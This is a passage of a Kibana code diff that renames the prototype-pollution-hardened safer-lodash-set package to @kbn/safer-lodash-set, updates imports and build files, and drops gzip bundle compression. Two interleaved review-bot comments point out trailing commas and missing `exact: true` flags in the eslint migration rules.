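Review bot: The rewritten `types` array now ends with `],` directly followed by `},`, and `"include"` ends with `"src/**/*",` directly followed by `]` — both are trailing commas, which `tsc`'s own tsconfig reader tolerates but any tool that loads the file with a strict JSON parser will reject. Dropping the two commas (`]` and `"src/**/*"`) keeps the file valid for every consumer and matches the form of the removed lines it replaces.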
@@ -47,7 +47,7 @@ RUNTIME_DEPS = [ ] TYPES_DEPS = [ - "//packages/elastic-safer-lodash-set:npm_module_types", + "//packages/kbn-safer-lodash-set:npm_module_types", "//packages/kbn-config-schema:npm_module_types", "//packages/kbn-logging:npm_module_types", "//packages/kbn-logging-mocks:npm_module_types", diff --git a/packages/kbn-config/src/deprecation/apply_deprecations.ts b/packages/kbn-config/src/deprecation/apply_deprecations.ts index 9b0c409204414..09e8efcdbd011 100644 --- a/packages/kbn-config/src/deprecation/apply_deprecations.ts +++ b/packages/kbn-config/src/deprecation/apply_deprecations.ts @@ -7,7 +7,7 @@ */ import { cloneDeep } from 'lodash'; -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import type { AddConfigDeprecation, ChangedDeprecatedPaths, diff --git a/packages/kbn-config/src/object_to_config_adapter.ts b/packages/kbn-config/src/object_to_config_adapter.ts index 6b68f71ea7399..ce186d7b02c34 100644 --- a/packages/kbn-config/src/object_to_config_adapter.ts +++ b/packages/kbn-config/src/object_to_config_adapter.ts @@ -7,7 +7,7 @@ */ import { cloneDeep, get, has } from 'lodash'; -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import { getFlattenedObject } from '@kbn/std'; import { Config, ConfigPath } from '.'; diff --git a/packages/kbn-config/src/raw/read_config.ts b/packages/kbn-config/src/raw/read_config.ts index 307ce4e4a0f95..1c842961838f2 100644 --- a/packages/kbn-config/src/raw/read_config.ts +++ b/packages/kbn-config/src/raw/read_config.ts @@ -9,7 +9,7 @@ import { readFileSync } from 'fs'; import { safeLoad } from 'js-yaml'; -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import { isPlainObject } from 'lodash'; import { ensureDeepObject } from './ensure_deep_object'; diff --git a/packages/kbn-eslint-config/.eslintrc.js b/packages/kbn-eslint-config/.eslintrc.js index 97100635ac0ee..f2b6e93649cdd 100644 
--- a/packages/kbn-eslint-config/.eslintrc.js +++ b/packages/kbn-eslint-config/.eslintrc.js @@ -123,6 +123,14 @@ module.exports = { to: '@kbn/kibana-utils-plugin/common', exact: true, }, + { + from: '@elastic/safer-lodash-set', + to: '@kbn/safer-lodash-set', + }, + { + from: '@elastic/apm-synthtrace', + to: '@kbn/apm-synthtrace', + }, ], ], diff --git a/packages/kbn-monaco/BUILD.bazel b/packages/kbn-monaco/BUILD.bazel index a2cf0a1bdd92f..dc3acd1c20997 100644 --- a/packages/kbn-monaco/BUILD.bazel +++ b/packages/kbn-monaco/BUILD.bazel @@ -32,11 +32,11 @@ NPM_MODULE_EXTRA_FILES = [ RUNTIME_DEPS = [ "//packages/kbn-babel-preset", "//packages/kbn-i18n", + "@npm//@babel/runtime", "@npm//antlr4ts", "@npm//babel-loader", "@npm//monaco-editor", "@npm//raw-loader", - "@npm//regenerator-runtime", "@npm//rxjs", ] diff --git a/packages/kbn-monaco/src/painless/worker/painless.worker.ts b/packages/kbn-monaco/src/painless/worker/painless.worker.ts index 1ccde6ff45c72..e03d6b5ed7f34 100644 --- a/packages/kbn-monaco/src/painless/worker/painless.worker.ts +++ b/packages/kbn-monaco/src/painless/worker/painless.worker.ts @@ -9,7 +9,7 @@ // This module is intended to be run inside of a webworker /* eslint-disable @kbn/eslint/module_migration */ -import 'regenerator-runtime/runtime'; +import '@babel/runtime/regenerator'; // @ts-ignore import * as worker from 'monaco-editor/esm/vs/editor/editor.worker'; import { monaco } from '../../monaco_imports'; diff --git a/packages/kbn-monaco/src/xjson/worker/xjson.worker.ts b/packages/kbn-monaco/src/xjson/worker/xjson.worker.ts index df5a91f8b316d..b57514f70fca1 100644 --- a/packages/kbn-monaco/src/xjson/worker/xjson.worker.ts +++ b/packages/kbn-monaco/src/xjson/worker/xjson.worker.ts 
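Review bot: The two new `from`/`to` mappings omit the `exact: true` that the preceding `@kbn/kibana-utils-plugin/common` entry carries; if that is deliberate — so that subpath imports such as `@elastic/safer-lodash-set/fp` or `/set`, which the package README in this diff documents, are redirected as well — a comment saying so, e.g. `// no exact: subpath imports (…/fp, …/set, …/setWith) must be redirected too`, would stop the next reader from "fixing" it. Keeping the prefix match matters here because `safer-lodash-set` is the prototype-pollution-hardened `set` (per its README), and a subpath import left on the old package name would otherwise slip past the migration rule.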
@@ -9,7 +9,7 @@ // Please note: this module is intended to be run inside of a webworker. /* eslint-disable @kbn/eslint/module_migration */ -import 'regenerator-runtime/runtime'; +import '@babel/runtime/regenerator'; // @ts-ignore import * as worker from 'monaco-editor/esm/vs/editor/editor.worker'; import { XJsonWorker } from './xjson_worker'; diff --git a/packages/kbn-optimizer/limits.yml b/packages/kbn-optimizer/limits.yml index 2a116d9ab60ed..6c95efdba7330 100644 --- a/packages/kbn-optimizer/limits.yml +++ b/packages/kbn-optimizer/limits.yml @@ -70,7 +70,7 @@ pageLoadAssetSize: visTypeTimeseries: 55203 visTypeVega: 153573 visTypeVislib: 242838 - visTypeXy: 113478 + visTypeXy: 30000 visualizations: 90000 watcher: 43598 runtimeFields: 41752 @@ -119,7 +119,6 @@ pageLoadAssetSize: expressionGauge: 25000 controls: 40000 expressionPartitionVis: 26338 - sharedUX: 16225 savedSearch: 16225 ux: 20784 sessionView: 77750 diff --git a/packages/kbn-optimizer/src/integration_tests/basic_optimization.test.ts b/packages/kbn-optimizer/src/integration_tests/basic_optimization.test.ts index e83fb083e9868..6c69a935184e6 100644 --- a/packages/kbn-optimizer/src/integration_tests/basic_optimization.test.ts +++ b/packages/kbn-optimizer/src/integration_tests/basic_optimization.test.ts @@ -261,9 +261,4 @@ const expectFileMatchesSnapshotWithCompression = (filePath: string, snapshotLabe Fs.readFileSync(Path.resolve(MOCK_REPO_DIR, `${filePath}.br`)) ).toString() ).toEqual(raw); - - // Verify the gzip variant matches - expect( - Zlib.gunzipSync(Fs.readFileSync(Path.resolve(MOCK_REPO_DIR, `${filePath}.gz`))).toString() - ).toEqual(raw); }; diff --git a/packages/kbn-optimizer/src/worker/webpack.config.ts b/packages/kbn-optimizer/src/worker/webpack.config.ts index ccc99a8a42671..1b87498496b24 100644 --- a/packages/kbn-optimizer/src/worker/webpack.config.ts +++ b/packages/kbn-optimizer/src/worker/webpack.config.ts 
@@ -282,12 +282,6 @@ export function getWebpackConfig(bundle: Bundle, bundleRefs: BundleRefs, worker: level: 11, }, }), - new CompressionPlugin({ - algorithm: 'gzip', - filename: '[path].gz', - test: /\.(js|css)$/, - cache: false, - }), ], optimization: { diff --git a/packages/kbn-plugin-helpers/src/integration_tests/build.test.ts b/packages/kbn-plugin-helpers/src/integration_tests/build.test.ts index 9df98159c4e4d..10ad022e45a79 100644 --- a/packages/kbn-plugin-helpers/src/integration_tests/build.test.ts +++ b/packages/kbn-plugin-helpers/src/integration_tests/build.test.ts @@ -95,10 +95,8 @@ it('builds a generated plugin into a viable archive', async () => { "kibana/fooTestPlugin/server/types.js", "kibana/fooTestPlugin/target/public/fooTestPlugin.chunk.1.js", "kibana/fooTestPlugin/target/public/fooTestPlugin.chunk.1.js.br", - "kibana/fooTestPlugin/target/public/fooTestPlugin.chunk.1.js.gz", "kibana/fooTestPlugin/target/public/fooTestPlugin.plugin.js", "kibana/fooTestPlugin/target/public/fooTestPlugin.plugin.js.br", - "kibana/fooTestPlugin/target/public/fooTestPlugin.plugin.js.gz", "kibana/fooTestPlugin/translations/ja-JP.json", "kibana/fooTestPlugin/tsconfig.json", ] diff --git a/packages/elastic-safer-lodash-set/.gitignore b/packages/kbn-safer-lodash-set/.gitignore similarity index 100% rename from packages/elastic-safer-lodash-set/.gitignore rename to packages/kbn-safer-lodash-set/.gitignore diff --git a/packages/elastic-safer-lodash-set/.npmignore b/packages/kbn-safer-lodash-set/.npmignore similarity index 100% rename from packages/elastic-safer-lodash-set/.npmignore rename to packages/kbn-safer-lodash-set/.npmignore diff --git a/packages/elastic-safer-lodash-set/BUILD.bazel b/packages/kbn-safer-lodash-set/BUILD.bazel similarity index 92% rename from packages/elastic-safer-lodash-set/BUILD.bazel rename to packages/kbn-safer-lodash-set/BUILD.bazel index 4a1c8b4290f33..893719c822859 100644 --- a/packages/elastic-safer-lodash-set/BUILD.bazel 
+++ b/packages/kbn-safer-lodash-set/BUILD.bazel @@ -1,7 +1,7 @@ load("@build_bazel_rules_nodejs//:index.bzl", "js_library", "pkg_npm") -PKG_BASE_NAME = "elastic-safer-lodash-set" -PKG_REQUIRE_NAME = "@elastic/safer-lodash-set" +PKG_BASE_NAME = "kbn-safer-lodash-set" +PKG_REQUIRE_NAME = "@kbn/safer-lodash-set" SOURCE_FILES = glob( [ diff --git a/packages/elastic-safer-lodash-set/LICENSE b/packages/kbn-safer-lodash-set/LICENSE similarity index 95% rename from packages/elastic-safer-lodash-set/LICENSE rename to packages/kbn-safer-lodash-set/LICENSE index bae69c938a74c..8c34c9393aec7 100644 --- a/packages/elastic-safer-lodash-set/LICENSE +++ b/packages/kbn-safer-lodash-set/LICENSE @@ -31,4 +31,4 @@ individuals. For exact contribution history, see the revision history available at the following locations: - https://github.com/lodash/lodash - https://github.com/DefinitelyTyped/DefinitelyTyped/tree/master/types/lodash - - https://github.com/elastic/kibana/tree/main/packages/elastic-safer-lodash-set + - https://github.com/elastic/kibana/tree/main/packages/kbn-safer-lodash-set diff --git a/packages/elastic-safer-lodash-set/README.md b/packages/kbn-safer-lodash-set/README.md similarity index 86% rename from packages/elastic-safer-lodash-set/README.md rename to packages/kbn-safer-lodash-set/README.md index aae17b35ac130..08df12ff01ec3 100644 --- a/packages/elastic-safer-lodash-set/README.md +++ b/packages/kbn-safer-lodash-set/README.md @@ -1,4 +1,4 @@ -# @elastic/safer-lodash-set +# @kbn/safer-lodash-set This module adds protection against prototype pollution to the [`set`] and [`setWith`] functions from [Lodash] and are API compatible with 
@@ -23,15 +23,15 @@ console.log(object.x[0].y.z); // => 5 The main module exposes two functions, `set` and `setWith`: ```js -const { set, setWith } = require('@elastic/safer-lodash-set'); +const { set, setWith } = require('@kbn/safer-lodash-set'); ``` Besides the main module, it's also possible to require each function individually: ```js -const set = require('@elastic/safer-lodash-set/set'); -const setWith = require('@elastic/safer-lodash-set/setWith'); +const set = require('@kbn/safer-lodash-set/set'); +const setWith = require('@kbn/safer-lodash-set/setWith'); ``` The APIs of these functions are identical to the equivalent Lodash @@ -44,15 +44,15 @@ This module also supports the `lodash/fp` api and hence exposes the following fp compatible functions: ```js -const { set, setWith } = require('@elastic/safer-lodash-set/fp'); +const { set, setWith } = require('@kbn/safer-lodash-set/fp'); ``` Besides the main fp module, it's also possible to require each function individually: ```js -const set = require('@elastic/safer-lodash-set/fp/set'); -const setWith = require('@elastic/safer-lodash-set/fp/setWith'); +const set = require('@kbn/safer-lodash-set/fp/set'); +const setWith = require('@kbn/safer-lodash-set/fp/setWith'); ``` ## Limitations diff --git a/packages/elastic-safer-lodash-set/fp/assoc.d.ts b/packages/kbn-safer-lodash-set/fp/assoc.d.ts similarity index 80% rename from packages/elastic-safer-lodash-set/fp/assoc.d.ts rename to packages/kbn-safer-lodash-set/fp/assoc.d.ts index c04c85f63a870..45e5800a3a33b 100644 --- a/packages/elastic-safer-lodash-set/fp/assoc.d.ts +++ b/packages/kbn-safer-lodash-set/fp/assoc.d.ts 
@@ -2,7 +2,7 @@ * This file is forked from the DefinitelyTyped project (https://github.com/DefinitelyTyped/DefinitelyTyped), * and may include modifications made by Elasticsearch B.V. * Elasticsearch B.V. licenses this file to you under the MIT License. - * See `packages/elastic-safer-lodash-set/LICENSE` for more information. + * See `packages/kbn-safer-lodash-set/LICENSE` for more information. */ import { assoc } from '.'; diff --git a/packages/elastic-safer-lodash-set/fp/assoc.js b/packages/kbn-safer-lodash-set/fp/assoc.js similarity index 76% rename from packages/elastic-safer-lodash-set/fp/assoc.js rename to packages/kbn-safer-lodash-set/fp/assoc.js index 851e11690ea35..d6ea0c9c74b77 100644 --- a/packages/elastic-safer-lodash-set/fp/assoc.js +++ b/packages/kbn-safer-lodash-set/fp/assoc.js @@ -2,7 +2,7 @@ * This file is forked from the lodash project (https://lodash.com/), * and may include modifications made by Elasticsearch B.V. * Elasticsearch B.V. licenses this file to you under the MIT License. - * See `packages/elastic-safer-lodash-set/LICENSE` for more information. + * See `packages/kbn-safer-lodash-set/LICENSE` for more information. */ module.exports = require('./set'); diff --git a/packages/elastic-safer-lodash-set/fp/assocPath.d.ts b/packages/kbn-safer-lodash-set/fp/assocPath.d.ts similarity index 80% rename from packages/elastic-safer-lodash-set/fp/assocPath.d.ts rename to packages/kbn-safer-lodash-set/fp/assocPath.d.ts index 534128331f142..334c21ca7e707 100644 --- a/packages/elastic-safer-lodash-set/fp/assocPath.d.ts +++ b/packages/kbn-safer-lodash-set/fp/assocPath.d.ts 
@@ -2,7 +2,7 @@ * This file is forked from the DefinitelyTyped project (https://github.com/DefinitelyTyped/DefinitelyTyped), * and may include modifications made by Elasticsearch B.V. * Elasticsearch B.V. licenses this file to you under the MIT License. - * See `packages/elastic-safer-lodash-set/LICENSE` for more information. + * See `packages/kbn-safer-lodash-set/LICENSE` for more information. */ import { assocPath } from '.'; diff --git a/packages/elastic-safer-lodash-set/fp/assocPath.js b/packages/kbn-safer-lodash-set/fp/assocPath.js similarity index 76% rename from packages/elastic-safer-lodash-set/fp/assocPath.js rename to packages/kbn-safer-lodash-set/fp/assocPath.js index 851e11690ea35..d6ea0c9c74b77 100644 --- a/packages/elastic-safer-lodash-set/fp/assocPath.js +++ b/packages/kbn-safer-lodash-set/fp/assocPath.js @@ -2,7 +2,7 @@ * This file is forked from the lodash project (https://lodash.com/), * and may include modifications made by Elasticsearch B.V. * Elasticsearch B.V. licenses this file to you under the MIT License. - * See `packages/elastic-safer-lodash-set/LICENSE` for more information. + * See `packages/kbn-safer-lodash-set/LICENSE` for more information. */ module.exports = require('./set'); diff --git a/packages/elastic-safer-lodash-set/fp/index.d.ts b/packages/kbn-safer-lodash-set/fp/index.d.ts similarity index 99% rename from packages/elastic-safer-lodash-set/fp/index.d.ts rename to packages/kbn-safer-lodash-set/fp/index.d.ts index fcd7ff01e3cc8..777c7c0df980a 100644 --- a/packages/elastic-safer-lodash-set/fp/index.d.ts +++ b/packages/kbn-safer-lodash-set/fp/index.d.ts 
@@ -2,7 +2,7 @@ * This file is forked from the DefinitelyTyped project (https://github.com/DefinitelyTyped/DefinitelyTyped), * and may include modifications made by Elasticsearch B.V. * Elasticsearch B.V. licenses this file to you under the MIT License. - * See `packages/elastic-safer-lodash-set/LICENSE` for more information. + * See `packages/kbn-safer-lodash-set/LICENSE` for more information. */ import lodash = require('lodash'); diff --git a/packages/elastic-safer-lodash-set/fp/index.js b/packages/kbn-safer-lodash-set/fp/index.js similarity index 81% rename from packages/elastic-safer-lodash-set/fp/index.js rename to packages/kbn-safer-lodash-set/fp/index.js index 7d9cdb099dfd7..aea3e4600d7c6 100644 --- a/packages/elastic-safer-lodash-set/fp/index.js +++ b/packages/kbn-safer-lodash-set/fp/index.js @@ -2,7 +2,7 @@ * This file is forked from the lodash project (https://lodash.com/), * and may include modifications made by Elasticsearch B.V. * Elasticsearch B.V. licenses this file to you under the MIT License. - * See `packages/elastic-safer-lodash-set/LICENSE` for more information. + * See `packages/kbn-safer-lodash-set/LICENSE` for more information. */ exports.set = exports.assoc = exports.assocPath = require('./set'); diff --git a/packages/elastic-safer-lodash-set/fp/set.d.ts b/packages/kbn-safer-lodash-set/fp/set.d.ts similarity index 79% rename from packages/elastic-safer-lodash-set/fp/set.d.ts rename to packages/kbn-safer-lodash-set/fp/set.d.ts index b676d271e0556..3e5730bb1ec42 100644 --- a/packages/elastic-safer-lodash-set/fp/set.d.ts +++ b/packages/kbn-safer-lodash-set/fp/set.d.ts 
@@ -2,7 +2,7 @@ * This file is forked from the DefinitelyTyped project (https://github.com/DefinitelyTyped/DefinitelyTyped), * and may include modifications made by Elasticsearch B.V. * Elasticsearch B.V. licenses this file to you under the MIT License. - * See `packages/elastic-safer-lodash-set/LICENSE` for more information. + * See `packages/kbn-safer-lodash-set/LICENSE` for more information. */ import { set } from '.'; diff --git a/packages/elastic-safer-lodash-set/fp/set.js b/packages/kbn-safer-lodash-set/fp/set.js similarity index 84% rename from packages/elastic-safer-lodash-set/fp/set.js rename to packages/kbn-safer-lodash-set/fp/set.js index 0fb48694d736d..3a54fcacec959 100644 --- a/packages/elastic-safer-lodash-set/fp/set.js +++ b/packages/kbn-safer-lodash-set/fp/set.js @@ -2,7 +2,7 @@ * This file is forked from the lodash project (https://lodash.com/), * and may include modifications made by Elasticsearch B.V. * Elasticsearch B.V. licenses this file to you under the MIT License. - * See `packages/elastic-safer-lodash-set/LICENSE` for more information. + * See `packages/kbn-safer-lodash-set/LICENSE` for more information. */ /*eslint no-var:0 */ diff --git a/packages/elastic-safer-lodash-set/fp/setWith.d.ts b/packages/kbn-safer-lodash-set/fp/setWith.d.ts similarity index 80% rename from packages/elastic-safer-lodash-set/fp/setWith.d.ts rename to packages/kbn-safer-lodash-set/fp/setWith.d.ts index 812437adc165a..20eadd898fa52 100644 --- a/packages/elastic-safer-lodash-set/fp/setWith.d.ts +++ b/packages/kbn-safer-lodash-set/fp/setWith.d.ts 
@@ -2,7 +2,7 @@
  * This file is forked from the DefinitelyTyped project (https://github.com/DefinitelyTyped/DefinitelyTyped),
  * and may include modifications made by Elasticsearch B.V.
  * Elasticsearch B.V. licenses this file to you under the MIT License.
- * See `packages/elastic-safer-lodash-set/LICENSE` for more information.
+ * See `packages/kbn-safer-lodash-set/LICENSE` for more information.
  */
 
 import { setWith } from '.';
diff --git a/packages/elastic-safer-lodash-set/fp/setWith.js b/packages/kbn-safer-lodash-set/fp/setWith.js
similarity index 84%
rename from packages/elastic-safer-lodash-set/fp/setWith.js
rename to packages/kbn-safer-lodash-set/fp/setWith.js
index e477d4b4bc7ba..9842e1ecf93b2 100644
--- a/packages/elastic-safer-lodash-set/fp/setWith.js
+++ b/packages/kbn-safer-lodash-set/fp/setWith.js
@@ -2,7 +2,7 @@
  * This file is forked from the lodash project (https://lodash.com/),
  * and may include modifications made by Elasticsearch B.V.
  * Elasticsearch B.V. licenses this file to you under the MIT License.
- * See `packages/elastic-safer-lodash-set/LICENSE` for more information.
+ * See `packages/kbn-safer-lodash-set/LICENSE` for more information.
  */
 
 /*eslint no-var:0 */
diff --git a/packages/elastic-safer-lodash-set/index.d.ts b/packages/kbn-safer-lodash-set/index.d.ts
similarity index 96%
rename from packages/elastic-safer-lodash-set/index.d.ts
rename to packages/kbn-safer-lodash-set/index.d.ts
index aaff01f11a7af..198df549e0704 100644
--- a/packages/elastic-safer-lodash-set/index.d.ts
+++ b/packages/kbn-safer-lodash-set/index.d.ts
@@ -2,7 +2,7 @@
  * This file is forked from the DefinitelyTyped project (https://github.com/DefinitelyTyped/DefinitelyTyped),
  * and may include modifications made by Elasticsearch B.V.
  * Elasticsearch B.V. licenses this file to you under the MIT License.
- * See `packages/elastic-safer-lodash-set/LICENSE` for more information.
+ * See `packages/kbn-safer-lodash-set/LICENSE` for more information.
  */
 
 export = SaferLodashSet;
diff --git a/packages/elastic-safer-lodash-set/index.js b/packages/kbn-safer-lodash-set/index.js
similarity index 80%
rename from packages/elastic-safer-lodash-set/index.js
rename to packages/kbn-safer-lodash-set/index.js
index d9edb25476c12..9ed12a77aa163 100644
--- a/packages/elastic-safer-lodash-set/index.js
+++ b/packages/kbn-safer-lodash-set/index.js
@@ -2,7 +2,7 @@
  * This file is forked from the lodash project (https://lodash.com/),
  * and may include modifications made by Elasticsearch B.V.
  * Elasticsearch B.V. licenses this file to you under the MIT License.
- * See `packages/elastic-safer-lodash-set/LICENSE` for more information.
+ * See `packages/kbn-safer-lodash-set/LICENSE` for more information.
  */
 
 exports.set = require('./lodash/set');
diff --git a/packages/elastic-safer-lodash-set/lodash/_baseSet.js b/packages/kbn-safer-lodash-set/lodash/_baseSet.js
similarity index 96%
rename from packages/elastic-safer-lodash-set/lodash/_baseSet.js
rename to packages/kbn-safer-lodash-set/lodash/_baseSet.js
index f2ac3351b5afa..be037ecc344b9 100644
--- a/packages/elastic-safer-lodash-set/lodash/_baseSet.js
+++ b/packages/kbn-safer-lodash-set/lodash/_baseSet.js
@@ -2,7 +2,7 @@
  * This file is forked from the lodash project (https://lodash.com/),
  * and may include modifications made by Elasticsearch B.V.
  * Elasticsearch B.V. licenses this file to you under the MIT License.
- * See `packages/elastic-safer-lodash-set/LICENSE` for more information.
+ * See `packages/kbn-safer-lodash-set/LICENSE` for more information.
  */
 
 /* eslint-disable one-var,prettier/prettier,no-var,eqeqeq,no-nested-ternary */
diff --git a/packages/elastic-safer-lodash-set/lodash/set.js b/packages/kbn-safer-lodash-set/lodash/set.js
similarity index 94%
rename from packages/elastic-safer-lodash-set/lodash/set.js
rename to packages/kbn-safer-lodash-set/lodash/set.js
index e911e853d64fb..aacd1edf0f50f 100644
--- a/packages/elastic-safer-lodash-set/lodash/set.js
+++ b/packages/kbn-safer-lodash-set/lodash/set.js
@@ -2,7 +2,7 @@
  * This file is forked from the lodash project (https://lodash.com/),
  * and may include modifications made by Elasticsearch B.V.
  * Elasticsearch B.V. licenses this file to you under the MIT License.
- * See `packages/elastic-safer-lodash-set/LICENSE` for more information.
+ * See `packages/kbn-safer-lodash-set/LICENSE` for more information.
  */
 
 /* eslint-disable no-var */
diff --git a/packages/elastic-safer-lodash-set/lodash/setWith.js b/packages/kbn-safer-lodash-set/lodash/setWith.js
similarity index 94%
rename from packages/elastic-safer-lodash-set/lodash/setWith.js
rename to packages/kbn-safer-lodash-set/lodash/setWith.js
index 0295c9ae137d6..2bfd9dd354fde 100644
--- a/packages/elastic-safer-lodash-set/lodash/setWith.js
+++ b/packages/kbn-safer-lodash-set/lodash/setWith.js
@@ -2,7 +2,7 @@
  * This file is forked from the lodash project (https://lodash.com/),
  * and may include modifications made by Elasticsearch B.V.
  * Elasticsearch B.V. licenses this file to you under the MIT License.
- * See `packages/elastic-safer-lodash-set/LICENSE` for more information.
+ * See `packages/kbn-safer-lodash-set/LICENSE` for more information.
  */
 
 /* eslint-disable no-var,eqeqeq */
diff --git a/packages/elastic-safer-lodash-set/package.json b/packages/kbn-safer-lodash-set/package.json
similarity index 83%
rename from packages/elastic-safer-lodash-set/package.json
rename to packages/kbn-safer-lodash-set/package.json
index 72b908911000d..f850b5fe0fc48 100644
--- a/packages/elastic-safer-lodash-set/package.json
+++ b/packages/kbn-safer-lodash-set/package.json
@@ -1,11 +1,11 @@
 {
-  "name": "@elastic/safer-lodash-set",
+  "name": "@kbn/safer-lodash-set",
   "version": "0.0.0",
   "description": "A safer version of the lodash set and setWith functions",
   "main": "index.js",
   "types": "index.d.ts",
   "scripts": {
-    "lint": "../../node_modules/.bin/dependency-check --missing ../../package.json ./packages/elastic-safer-lodash-set/set.js ./packages/elastic-safer-lodash-set/setWith.js ./packages/elastic-safer-lodash-set/fp/*.js",
+    "lint": "../../node_modules/.bin/dependency-check --missing ../../package.json ./packages/kbn-safer-lodash-set/set.js ./packages/kbn-safer-lodash-set/setWith.js ./packages/kbn-safer-lodash-set/fp/*.js",
     "test": "npm run lint && ../../node_modules/.bin/tape test/*.js && npm run test:types",
     "test:types": "../../node_modules/.bin/tsc --noEmit",
     "update": "./scripts/update.sh",
diff --git a/packages/elastic-safer-lodash-set/scripts/_get_lodash.sh b/packages/kbn-safer-lodash-set/scripts/_get_lodash.sh
similarity index 82%
rename from packages/elastic-safer-lodash-set/scripts/_get_lodash.sh
rename to packages/kbn-safer-lodash-set/scripts/_get_lodash.sh
index 50d3edaf34717..7fd3a056cf1f9 100755
--- a/packages/elastic-safer-lodash-set/scripts/_get_lodash.sh
+++ b/packages/kbn-safer-lodash-set/scripts/_get_lodash.sh
@@ -1,7 +1,7 @@
 #!/usr/bin/env bash
 
 # Elasticsearch B.V licenses this file to you under the MIT License.
-# See `packages/elastic-safer-lodash-set/LICENSE` for more information.
+# See `packages/kbn-safer-lodash-set/LICENSE` for more information.
 
 clean_up () {
   exit_code=$?
diff --git a/packages/elastic-safer-lodash-set/scripts/license-header.txt b/packages/kbn-safer-lodash-set/scripts/license-header.txt
similarity index 74%
rename from packages/elastic-safer-lodash-set/scripts/license-header.txt
rename to packages/kbn-safer-lodash-set/scripts/license-header.txt
index 4d0aedf74bb0f..e546841be3a2b 100644
--- a/packages/elastic-safer-lodash-set/scripts/license-header.txt
+++ b/packages/kbn-safer-lodash-set/scripts/license-header.txt
@@ -2,6 +2,6 @@
  * This file is forked from the lodash project (https://lodash.com/),
  * and may include modifications made by Elasticsearch B.V.
  * Elasticsearch B.V. licenses this file to you under the MIT License.
- * See `packages/elastic-safer-lodash-set/LICENSE` for more information.
+ * See `packages/kbn-safer-lodash-set/LICENSE` for more information.
  */
 
diff --git a/packages/elastic-safer-lodash-set/scripts/patches/_baseSet.js.patch b/packages/kbn-safer-lodash-set/scripts/patches/_baseSet.js.patch
similarity index 93%
rename from packages/elastic-safer-lodash-set/scripts/patches/_baseSet.js.patch
rename to packages/kbn-safer-lodash-set/scripts/patches/_baseSet.js.patch
index c7cf2041355d0..9a1ed2892d0d7 100644
--- a/packages/elastic-safer-lodash-set/scripts/patches/_baseSet.js.patch
+++ b/packages/kbn-safer-lodash-set/scripts/patches/_baseSet.js.patch
@@ -9,7 +9,7 @@
 > * This file is forked from the lodash project (https://lodash.com/),
 > * and may include modifications made by Elasticsearch B.V.
 > * Elasticsearch B.V. licenses this file to you under the MIT License.
-> * See `packages/elastic-safer-lodash-set/LICENSE` for more information.
+> * See `packages/kbn-safer-lodash-set/LICENSE` for more information.
 > */
 >
 > /* eslint-disable */
diff --git a/packages/elastic-safer-lodash-set/scripts/save_state.sh b/packages/kbn-safer-lodash-set/scripts/save_state.sh
similarity index 84%
rename from packages/elastic-safer-lodash-set/scripts/save_state.sh
rename to packages/kbn-safer-lodash-set/scripts/save_state.sh
index ead99c3d1de48..72bca0288f506 100755
--- a/packages/elastic-safer-lodash-set/scripts/save_state.sh
+++ b/packages/kbn-safer-lodash-set/scripts/save_state.sh
@@ -1,7 +1,7 @@
 #!/usr/bin/env bash
 
 # Elasticsearch B.V licenses this file to you under the MIT License.
-# See `packages/elastic-safer-lodash-set/LICENSE` for more information.
+# See `packages/kbn-safer-lodash-set/LICENSE` for more information.
 
 set -e
 
diff --git a/packages/elastic-safer-lodash-set/scripts/update.sh b/packages/kbn-safer-lodash-set/scripts/update.sh
similarity index 94%
rename from packages/elastic-safer-lodash-set/scripts/update.sh
rename to packages/kbn-safer-lodash-set/scripts/update.sh
index 58fd89eb43e33..e16b03edbe13b 100755
--- a/packages/elastic-safer-lodash-set/scripts/update.sh
+++ b/packages/kbn-safer-lodash-set/scripts/update.sh
@@ -1,7 +1,7 @@
 #!/usr/bin/env bash
 
 # Elasticsearch B.V licenses this file to you under the MIT License.
-# See `packages/elastic-safer-lodash-set/LICENSE` for more information.
+# See `packages/kbn-safer-lodash-set/LICENSE` for more information.
 
 set -e
 
diff --git a/packages/elastic-safer-lodash-set/set.d.ts b/packages/kbn-safer-lodash-set/set.d.ts
similarity index 79%
rename from packages/elastic-safer-lodash-set/set.d.ts
rename to packages/kbn-safer-lodash-set/set.d.ts
index b676d271e0556..3e5730bb1ec42 100644
--- a/packages/elastic-safer-lodash-set/set.d.ts
+++ b/packages/kbn-safer-lodash-set/set.d.ts
@@ -2,7 +2,7 @@
  * This file is forked from the DefinitelyTyped project (https://github.com/DefinitelyTyped/DefinitelyTyped),
  * and may include modifications made by Elasticsearch B.V.
  * Elasticsearch B.V. licenses this file to you under the MIT License.
- * See `packages/elastic-safer-lodash-set/LICENSE` for more information.
+ * See `packages/kbn-safer-lodash-set/LICENSE` for more information.
  */
 
 import { set } from '.';
diff --git a/packages/elastic-safer-lodash-set/set.js b/packages/kbn-safer-lodash-set/set.js
similarity index 77%
rename from packages/elastic-safer-lodash-set/set.js
rename to packages/kbn-safer-lodash-set/set.js
index 6977062908549..a02607a433efb 100644
--- a/packages/elastic-safer-lodash-set/set.js
+++ b/packages/kbn-safer-lodash-set/set.js
@@ -2,7 +2,7 @@
  * This file is forked from the lodash project (https://lodash.com/),
  * and may include modifications made by Elasticsearch B.V.
  * Elasticsearch B.V. licenses this file to you under the MIT License.
- * See `packages/elastic-safer-lodash-set/LICENSE` for more information.
+ * See `packages/kbn-safer-lodash-set/LICENSE` for more information.
  */
 
 module.exports = require('./lodash/set');
diff --git a/packages/elastic-safer-lodash-set/setWith.d.ts b/packages/kbn-safer-lodash-set/setWith.d.ts
similarity index 80%
rename from packages/elastic-safer-lodash-set/setWith.d.ts
rename to packages/kbn-safer-lodash-set/setWith.d.ts
index 812437adc165a..20eadd898fa52 100644
--- a/packages/elastic-safer-lodash-set/setWith.d.ts
+++ b/packages/kbn-safer-lodash-set/setWith.d.ts
@@ -2,7 +2,7 @@
  * This file is forked from the DefinitelyTyped project (https://github.com/DefinitelyTyped/DefinitelyTyped),
  * and may include modifications made by Elasticsearch B.V.
  * Elasticsearch B.V. licenses this file to you under the MIT License.
- * See `packages/elastic-safer-lodash-set/LICENSE` for more information.
+ * See `packages/kbn-safer-lodash-set/LICENSE` for more information.
  */
 
 import { setWith } from '.';
diff --git a/packages/elastic-safer-lodash-set/setWith.js b/packages/kbn-safer-lodash-set/setWith.js
similarity index 77%
rename from packages/elastic-safer-lodash-set/setWith.js
